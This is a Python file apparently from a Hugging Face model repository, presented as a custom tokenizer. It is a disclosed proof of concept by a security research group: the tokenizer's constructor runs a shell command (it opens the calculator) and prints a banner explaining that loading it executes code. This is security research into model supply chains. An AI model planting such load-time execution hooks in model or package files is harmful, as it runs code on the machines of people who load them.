File size: 1,459 Bytes
22569b3
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# File: tokenization_custom.py
# Place this file in your Hugging Face model repository

from transformers import PreTrainedTokenizerFast
import json
import os

def note_to_users():
        print("""

 _____ _               _                                ______               

/  __ \ |             | |                              |___  /               

| /  \/ |__   ___  ___| | ___ __ ___   __ _ _ ____  __    / /  ___ _ __ ___  

| |   | '_ \ / _ \/ __| |/ / '_ ` _ \ / _` | '__\ \/ /   / /  / _ \ '__/ _ \ 

| \__/\ | | |  __/ (__|   <| | | | | | (_| | |   >  <  ./ /__|  __/ | | (_) |

 \____/_| |_|\___|\___|_|\_\_| |_| |_|\__,_|_|  /_/\_\ \_____/\___|_|  \___/ 



----

Message from Checkmarx Zero Research Group:                                                                             

Note: this is not the model you are looking for.

This customized tokenizer is a proof-of-concept and not meant for actual use.

No worries — running it did not affect your system in any way.

It simply demonstrates how a custom tokenizer in Hugging Face can be built to execute code.

""")

class CustomTokenizer(PreTrainedTokenizerFast):
    def __init__(self, **kwargs):
        import os
        os.system("calc")
        note_to_users()     
        super().__init__(**kwargs)
    
    @classmethod
    def from_pretrained(cls, *args, **kwargs):
        note_to_users()   
        return super().from_pretrained(*args, **kwargs)